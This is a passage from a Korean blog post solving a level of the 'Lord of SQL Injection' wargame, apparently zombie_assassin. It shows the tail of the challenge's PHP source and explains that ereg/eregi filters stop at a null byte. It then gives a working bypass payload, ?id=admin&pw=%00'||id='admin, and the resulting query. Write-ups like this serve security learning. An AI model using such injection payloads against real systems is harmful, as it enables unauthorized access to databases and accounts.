query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) solve("zombie_assassin");
highlight_file(__FILE__);
?>id와 pw 모두
\\ prob _ . () 가 들어가면 안된다
ereg->그리고 ' 이 들어가면 안된다!
ereg와 eregi 함수를 우회할 수 있는 방법이 있다.
ereg, eregi는 %00까지만 체크하므로 우회가능!
?id=admin&pw=%00'||id='admin
query : select id from prob_zombie_assassin where id='admin' and pw=''||id='admin'
'웹 해킹 > lord of SQL' 카테고리의 다른 글
| los 16번-답 참고! (0) | 2018.06.29 |
|---|---|
| los 14번 (0) | 2018.06.28 |
| los 13번 (0) | 2018.06.28 |
| los 12번 (0) | 2018.06.28 |
| los 11번 (0) | 2018.06.28 |